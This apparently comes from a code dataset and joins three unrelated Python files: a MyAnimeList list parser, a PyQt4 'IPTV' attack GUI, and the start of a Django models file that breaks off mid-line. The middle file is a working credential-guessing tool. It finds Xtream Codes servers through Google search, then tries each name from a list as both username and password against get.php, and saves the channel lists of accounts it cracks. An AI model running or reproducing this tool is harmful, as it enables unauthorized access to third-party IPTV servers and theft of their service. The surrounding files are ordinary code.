MediaList(Base, collections.Mapping, metaclass=abc.ABCMeta):\n _id_attribute = \"username\"\n\n def __getitem__(self, media):\n return self.list[media]\n\n def __contains__(self, media):\n return media in self.list\n\n def __len__(self):\n return len(self.list)\n\n def __iter__(self):\n for media in self.list:\n yield media\n\n def __init__(self, session, user_name):\n super(MediaList, self).__init__(session)\n self.username = user_name\n if not isinstance(self.username, str) or len(self.username) < 1:\n raise InvalidMediaListError(self.username)\n self._list = None\n self._stats = None\n\n # subclasses must define a list type, ala \"anime\" or \"manga\"\n @abc.abstractmethod\n def type(self):\n pass\n\n # a list verb ala \"watch\", \"read\", etc\n @abc.abstractmethod\n def verb(self):\n pass\n\n # a list with status ints as indices and status texts as values.\n @property\n def user_status_terms(self):\n statuses = collections.defaultdict(lambda: 'Unknown')\n statuses[1] = self.verb.capitalize() + 'ing'\n statuses[2] = 'Completed'\n statuses[3] = 'On-Hold'\n statuses[4] = 'Dropped'\n statuses[6] = 'Plan to ' + self.verb.capitalize()\n return statuses\n\n def parse_entry_media_attributes(self, soup):\n \"\"\"\n Args:\n soup: a lxml.html.HtmlElement containing a row from the current media list\n\n Return a dict of attributes of the media the row is about.\n \"\"\"\n row_info = {}\n\n try:\n start = utilities.parse_profile_date(soup.find('.//series_start').text)\n except ValueError:\n start = None\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n if start is not None:\n try:\n row_info['aired'] = (start, utilities.parse_profile_date(soup.find('.//series_end').text))\n except ValueError:\n row_info['aired'] = (start, None)\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n # look up the given media type's status terms.\n status_terms = getattr(self.session, self.type)(1)._status_terms\n\n try:\n row_info['id'] = int(soup.find('.//series_' + self.type + 'db_id').text)\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n row_info['title'] = soup.find('.//series_title').text\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n row_info['status'] = status_terms[int(soup.find('.//series_status').text)]\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n row_info['picture'] = soup.find('.//series_image').text\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n return row_info\n\n def parse_entry(self, soup):\n \"\"\"\n Given:\n soup: a lxml.html.HtmlElement containing a row from the current media list\n\n Return a tuple:\n (media object, dict of this row's parseable attributes)\n \"\"\"\n # parse the media object first.\n media_attrs = self.parse_entry_media_attributes(soup)\n media_id = media_attrs['id']\n del media_attrs['id']\n media = getattr(self.session, self.type)(media_id).set(media_attrs)\n\n entry_info = {}\n try:\n entry_info['started'] = utilities.parse_profile_date(soup.find('.//my_start_date').text)\n except ValueError:\n entry_info['started'] = None\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n entry_info['finished'] = utilities.parse_profile_date(soup.find('.//my_finish_date').text)\n except ValueError:\n entry_info['finished'] = None\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n entry_info['status'] = self.user_status_terms[int(soup.find('.//my_status').text)]\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n entry_info['score'] = int(soup.find('.//my_score').text)\n # if user hasn't set a score, set it to None to indicate as such.\n if entry_info['score'] == 0:\n entry_info['score'] = None\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n entry_info['last_updated'] = datetime.datetime.fromtimestamp(int(soup.find('.//my_last_updated').text))\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n return media, entry_info\n\n def parse_stats(self, soup):\n \"\"\"\n Given:\n soup: a lxml.etree element containing the current media list's stats\n\n Return a dict of this media list's stats.\n \"\"\"\n stats = {}\n for row in soup.getchildren():\n try:\n key = row.tag.replace('user_', '')\n if key == 'id':\n stats[key] = int(row.text)\n elif key == 'name':\n stats[key] = row.text\n elif key == self.verb + 'ing':\n try:\n stats[key] = int(row.text)\n except ValueError:\n stats[key] = 0\n elif key == 'completed':\n try:\n stats[key] = int(row.text)\n except ValueError:\n stats[key] = 0\n elif key == 'onhold':\n try:\n stats['on_hold'] = int(row.text)\n except ValueError:\n stats[key] = 0\n elif key == 'dropped':\n try:\n stats[key] = int(row.text)\n except ValueError:\n stats[key] = 0\n elif key == 'planto' + self.verb:\n try:\n stats['plan_to_' + self.verb] = int(row.text)\n except ValueError:\n stats[key] = 0\n # for some reason, MAL doesn't substitute 'read' in for manga for the verb here\n elif key == 'days_spent_watching':\n try:\n stats['days_spent'] = decimal.Decimal(row.text)\n except decimal.InvalidOperation:\n stats[key] = decimal.Decimal(0)\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n return stats\n\n def parse(self, xml):\n list_info = {}\n list_page = et.fromstring(xml.encode())\n\n primary_elt = list_page\n if primary_elt is None:\n raise MalformedMediaListPageError(self.username, xml,\n message=\"Could not find root XML element in \" + self.type + \" list\")\n\n bad_username_elt = list_page.find('.//error')\n if bad_username_elt is not None:\n raise InvalidMediaListError(self.username, message=\"Invalid username when fetching \" + self.type + \" list\")\n\n stats_elt = list_page.find('.//myinfo')\n if stats_elt is None and not utilities.check_if_mal_response_is_empty(list_page):\n raise MalformedMediaListPageError(self.username, xml,\n message=\"Could not find stats element in \" + self.type + \" list\")\n\n if utilities.check_if_mal_response_is_empty(list_page):\n raise InvalidMediaListError(self.username, message=\"Empty result set when fetching \" + self.type + \" list\")\n\n list_info['stats'] = self.parse_stats(stats_elt)\n\n list_info['list'] = {}\n for row in list_page.findall(\".//%s\" % self.type):\n (media, entry) = self.parse_entry(row)\n list_info['list'][media] = entry\n\n return list_info\n\n def load(self):\n media_list = self.session.get('https://myanimelist.net/malappinfo.php?' + urllib.parse.urlencode(\n {'u': self.username, 'status': 'all', 'type': self.type})).text\n self.set(self.parse(media_list))\n return self\n\n @property\n @loadable('load')\n def list(self):\n return self._list\n\n @property\n @loadable('load')\n def stats(self):\n return self._stats\n\n def section(self, status):\n return {k: self.list[k] for k in self.list if self.list[k]['status'] == status}\n", "sub_path": "myanimelist/media_list.py", "file_name": "media_list.py", "file_ext": "py", "file_size_in_byte": 9254, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "base.MalformedPageError", "line_number": 15, "usage_type": "name"}, {"api_name": "base.InvalidBaseError", "line_number": 19, "usage_type": "name"}, {"api_name": "base.Base", "line_number": 23, "usage_type": "name"}, {"api_name": "collections.Mapping", "line_number": 23, "usage_type": "attribute"}, {"api_name": "abc.ABCMeta", "line_number": 23, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 48, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 53, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 170, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 170, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 220, "usage_type": "call"}, {"api_name": "decimal.InvalidOperation", "line_number": 221, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 222, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 230, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 230, "usage_type": "name"}, {"api_name": "urllib.request.parse.urlencode", "line_number": 259, "usage_type": "call"}, {"api_name": "urllib.request.parse", "line_number": 259, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 259, "usage_type": "name"}, {"api_name": "base.loadable", "line_number": 265, "usage_type": "call"}, {"api_name": "base.loadable", "line_number": 270, "usage_type": "call"}]} {"seq_id": "56384", "text": "# -*- coding: utf-8 -*-\n#########################################################################\n# This program is free software; you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation; either version 2 of the License, or #\n# (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License #\n# along with this program; if not, write to the Free Software #\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, #\n# MA 02110-1301, USA. #\n############################# DISCALIMER ################################\n# Usage of this software for probing/attacking targets without prior #\n# mutual consent, is illegal. It's the end user's responsability to #\n# obey alla applicable local laws. Developers assume no liability and #\n# are not responible for any missue or damage caused by thi program #\n#########################################################################\n\n#by Pinperepette - The Pirate\n\nfrom PyQt4 import QtCore, QtGui\nimport urllib2\nimport google\nimport os\nimport time\nimport sys\nfrom urlparse import urlparse\nimport subprocess\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n\n#Parameters\nsearch = \"Xtream Codes v1.0.59.5\"\nmsg = \"\"\nll = \"\"\n\ndirectory = \"output\"\nnames = \"names.txt\"\n\n#così funziona su mac... sistemare per tutti i sistemi coccodio !!! :P \ndef apri():\n subprocess.Popen(['open', \"output\"])\n\n\nclass Ui_Form(QtGui.QWidget):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8(\"Form\"))\n Form.resize(609, 321)\n self.gridLayout = QtGui.QGridLayout(Form)\n self.gridLayout.setObjectName(_fromUtf8(\"gridLayout\"))\n\n self.comboBox = QtGui.QComboBox(Form)\n self.comboBox.setObjectName(_fromUtf8(\"comboBox\"))\n self.link = []\n self.comboBox.addItems(self.link)\n\n self.gridLayout.addWidget(self.comboBox, 0, 0, 1, 2)\n self.verticalLayout = QtGui.QVBoxLayout()\n self.verticalLayout.setObjectName(_fromUtf8(\"verticalLayout\"))\n spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n self.verticalLayout.addItem(spacerItem)\n\n self.lcdNumber = QtGui.QLCDNumber(Form)\n self.lcdNumber.setObjectName(_fromUtf8(\"lcdNumber\"))\n\n self.verticalLayout.addWidget(self.lcdNumber)\n spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n self.verticalLayout.addItem(spacerItem1)\n\n self.dial = QtGui.QDial(Form)\n self.dial.setObjectName(_fromUtf8(\"dial\"))\n\n self.verticalLayout.addWidget(self.dial)\n spacerItem2 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n self.verticalLayout.addItem(spacerItem2)\n\n self.pushButton_3 = QtGui.QPushButton(Form)\n self.pushButton_3.setObjectName(_fromUtf8(\"pushButton_3\"))\n self.pushButton_3.clicked.connect(self.search_link)\n\n self.verticalLayout.addWidget(self.pushButton_3)\n spacerItem3 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n self.verticalLayout.addItem(spacerItem3)\n\n self.pushButton_2 = QtGui.QPushButton(Form)\n self.pushButton_2.setObjectName(_fromUtf8(\"pushButton_2\"))\n self.connect(self.pushButton_2, QtCore.SIGNAL(\"released()\"), self.action)\n\n self.verticalLayout.addWidget(self.pushButton_2)\n spacerItem4 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n self.verticalLayout.addItem(spacerItem4)\n\n self.pushButton = QtGui.QPushButton(Form)\n self.pushButton.setObjectName(_fromUtf8(\"pushButton\"))\n self.pushButton.clicked.connect(apri)\n\n self.verticalLayout.addWidget(self.pushButton)\n self.gridLayout.addLayout(self.verticalLayout, 0, 2, 5, 1)\n self.line = QtGui.QFrame(Form)\n self.line.setFrameShape(QtGui.QFrame.HLine)\n self.line.setFrameShadow(QtGui.QFrame.Sunken)\n self.line.setObjectName(_fromUtf8(\"line\"))\n self.gridLayout.addWidget(self.line, 1, 0, 1, 2)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setObjectName(_fromUtf8(\"label_2\"))\n self.gridLayout.addWidget(self.label_2, 2, 0, 1, 1)\n self.lineEdit = QtGui.QLineEdit(Form)\n self.lineEdit.setObjectName(_fromUtf8(\"lineEdit\"))\n self.gridLayout.addWidget(self.lineEdit, 2, 1, 1, 1)\n self.line_2 = QtGui.QFrame(Form)\n self.line_2.setFrameShape(QtGui.QFrame.HLine)\n self.line_2.setFrameShadow(QtGui.QFrame.Sunken)\n self.line_2.setObjectName(_fromUtf8(\"line_2\"))\n self.gridLayout.addWidget(self.line_2, 3, 0, 1, 2)\n\n self.terminal = QtGui.QListWidget(Form)\n self.terminal.setObjectName(_fromUtf8(\"terminal\"))\n self.terminal.setStyleSheet(_fromUtf8(\"color: rgb(0, 220, 67);\\n\" \"background-color:rgb(4, 4, 4)\"))\n self.threadPool = []\n\n self.gridLayout.addWidget(self.terminal, 4, 0, 1, 2)\n\n self.retranslateUi(Form)\n QtCore.QObject.connect(self.comboBox, QtCore.SIGNAL(_fromUtf8(\"currentIndexChanged(QString)\")), self.lineEdit.setText)\n QtCore.QObject.connect(self.dial, QtCore.SIGNAL(_fromUtf8(\"valueChanged(int)\")), self.lcdNumber.display)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate(\"Form\", \"IPTV\", None))\n self.pushButton_3.setText(_translate(\"Form\", \"Search\", None))\n self.pushButton_2.setText(_translate(\"Form\", \"Attack\", None))\n self.pushButton.setText(_translate(\"Form\", \"Open\", None))\n self.label_2.setText(_translate(\"Form\", \"TARGET :\", None))\n\n def search_link(self,text=\"CoccoDio\",iters=6,delay=0.1):\n global ll\n number = int(self.lcdNumber.value())\n for url in google.search(search, num = number, stop = 1):\n parsed = urlparse(url)\n ll = str(parsed.scheme + \"://\" + parsed.netloc)\n self.link.append( LlThread() )\n self.connect( self.link[len(self.link)-1], QtCore.SIGNAL(\"update(QString)\"), self.add_ll )\n self.link[len(self.link)-1].start()\n time.sleep(delay)\n\n\n def add(self, text):\n self.terminal.addItem(text)\n self.terminal.sortItems()\n\n def add_ll(self, text):\n self.comboBox.addItem(text)\n\n def segnale(self, delay=0.1):\n self.threadPool.append( MsgThread() )\n self.connect( self.threadPool[len(self.threadPool)-1], QtCore.SIGNAL(\"update(QString)\"), self.add )\n self.threadPool[len(self.threadPool)-1].start()\n time.sleep(delay)\n\n def Attack(self,text=\"CoccoDio\",iters=6,delay=0.1):\n global msg\n global URL\n URL = str(self.lineEdit.text())\n if URL == \"\":\n msg = \"select a target\"\n self.segnale()\n else:\n msg = (\"Attack URL: \" + URL )\n self.segnale()\n rows = open(names , \"r\")\n NR = len(rows.readlines())\n TT = (str(NR))\n n = NR\n msg = (\"the list contains \" + TT + \" elements\")\n self.segnale()\n tr = 0\n with open(names) as f:\n content = f.readlines()\n for r in content:\n req = urllib2.Request( URL + \"/get.php?username=%s&password=%s&type=m3u&output=mpegts\" % (r.rstrip().lstrip(), r.rstrip().lstrip()))\n response = urllib2.urlopen(req)\n the_page = response.read()\n NR = (NR - 1)\n TM = (str(NR))\n msg = (\"request number \" + TM + \" of \" + TT + \" for name: \" + r.rstrip().lstrip())\n self.segnale()\n if len(the_page) > 0:\n tr = (tr + 1)\n msg = \"account found !!! \"\n self.segnale()\n new_path = directory + \"/\" + URL.replace(\"http://\", \"\")\n if os.path.exists(new_path) is False:\n os.makedirs(new_path)\n out_file = open(str(new_path) + \"/tv_channels_%s.m3u\" % r.rstrip().lstrip(), \"w\")\n out_file.write(the_page)\n out_file.close()\n trov = (str(tr))\n msg = (\"Accounts found: \" + trov)\n self.segnale()\n\n\n def action_ll(self):\n self.link.append( GenericThread(self.Attack,ll,delay=0.1) )\n self.disconnect( self, QtCore.SIGNAL(\"add(QString)\"), self.add_ll )\n self.connect( self, QtCore.SIGNAL(\"add(QString)\"), self.add_ll )\n self.link[len(self.link)-1].start()\n\n def action(self):\n self.threadPool.append( GenericThread(self.Attack,msg,delay=0.1) )\n self.disconnect( self, QtCore.SIGNAL(\"add(QString)\"), self.add )\n self.connect( self, QtCore.SIGNAL(\"add(QString)\"), self.add )\n self.threadPool[len(self.threadPool)-1].start()\n\nclass MsgThread(QtCore.QThread):\n def __init__(self):\n QtCore.QThread.__init__(self)\n\n def __del__(self):\n self.wait()\n\n def run(self):\n time.sleep(0.1)\n self.emit( QtCore.SIGNAL('update(QString)'), msg )\n return\n\nclass LlThread(QtCore.QThread):\n def __init__(self):\n QtCore.QThread.__init__(self)\n\n def __del__(self):\n self.wait()\n\n def run(self):\n time.sleep(0.1)\n self.emit( QtCore.SIGNAL('update(QString)'), ll )\n return\n\nclass GenericThread(QtCore.QThread):\n def __init__(self, function, *args, **kwargs):\n QtCore.QThread.__init__(self)\n self.function = function\n self.args = args\n self.kwargs = kwargs\n\n def __del__(self):\n self.wait()\n\n def run(self):\n self.function(*self.args,**self.kwargs)\n return\n\nif __name__ == \"__main__\":\n import sys\n app = QtGui.QApplication(sys.argv)\n Form = QtGui.QWidget()\n ui = Ui_Form()\n ui.setupUi(Form)\n Form.show()\n sys.exit(app.exec_())\n\n", "sub_path": "iptv/iptv_gui.py", "file_name": "iptv_gui.py", "file_ext": "py", "file_size_in_byte": 11136, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyQt4.QtCore.QString", "line_number": 35, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 41, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication.translate", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication.translate", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 46, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 46, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 58, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget.__init__", "line_number": 63, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 63, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 67, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QComboBox", "line_number": 70, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 70, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 76, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 78, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 78, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QLCDNumber", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 81, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 85, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 85, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QDial", "line_number": 88, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 88, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 92, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 92, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 95, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 95, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 100, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 100, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 103, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 103, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 105, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 105, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 108, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 108, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 108, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 111, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 117, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 118, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 118, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 119, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 119, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 122, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 122, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 125, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 125, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 128, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 129, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 129, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 130, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 130, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 134, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 134, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QObject.connect", "line_number": 142, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject", "line_number": 142, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 142, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 142, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject.connect", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject", "line_number": 143, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 143, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QMetaObject.connectSlotsByName", "line_number": 144, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QMetaObject", "line_number": 144, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 144, "usage_type": "name"}, {"api_name": "google.search", "line_number": 156, "usage_type": "call"}, {"api_name": "urlparse.urlparse", "line_number": 157, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 160, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 160, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 162, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 174, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 174, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 176, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 198, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 211, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 222, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 222, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 223, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 223, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 228, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 228, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 229, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 229, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 232, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 232, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 234, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 234, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 234, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 240, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 241, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 241, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 244, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 244, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 246, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 246, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 246, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 252, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 253, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 253, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 256, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 256, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 258, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 258, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 258, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 272, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 272, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 272, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 273, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 273, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 277, "usage_type": "call"}]} {"seq_id": "226769007", "text": "from __future__ import unicode_literals, absolute_import\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\nfrom django.contrib.postgres.fields import JSONField\nfrom django.contrib.gis.db import models\n\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import timedelta, datetime\n\nfrom tracking import models as tracking\n\n\nCRITICALITY_CHOICES = (\n (1, 'Critical'),\n (2, 'Moderate'),\n (3, 'Low'),\n)\nIMPORTANCE_CHOICES = (\n (1, 'High'),\n (2, 'Medium'),\n (3, 'Low'),\n)\nDOC_STATUS_CHOICES = (\n (1, 'Draft'),\n (2, 'Released'),\n (3, 'Superseded'),\n)\n\n\nclass DocumentApproval(models.Model):\n \"\"\"A model to represent an approval/endorsement by a DepartmentUser for an\n uploaded file.\n \"\"\"\n department_user = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT)\n approval_role = models.CharField(\n max_length=256, blank=True, null=True,\n help_text='The role in which the user is approving the document.')\n evidence = models.FileField(\n blank=True, null=True, max_length=255, upload_to='uploads/%Y/%m/%d',\n help_text='Optional evidence to support the document approval (email, etc.)')\n date_created = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n if self.approval_role:\n return \"{}, {} ({})\".format(\n self.department_user, self.approval_role,\n datetime.strftime(self.date_created, '%d-%b-%Y'))\n else:\n return \"{} ({})\".format(\n self.department_user, datetime.strftime(self.date_created, '%d-%b-%Y'))\n\n\nclass Location(models.Model):\n name = models.CharField(max_length=256, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n address = models.TextField(unique=True, blank=True)\n pobox = models.TextField(blank=True, verbose_name='PO Box')\n phone = models.CharField(max_length=128, null=True, blank=True)\n fax = models.CharField(max_length=128, null=True, blank=True)\n email = models.CharField(max_length=128, null=True, blank=True)\n point = models.PointField(null=True, blank=True)\n url = models.CharField(max_length=2000, help_text=\"URL to webpage with more information\", null=True, blank=True)\n bandwidth_url = models.CharField(max_length=2000, help_text=\"URL to prtg graph of bw utilisation\", null=True, 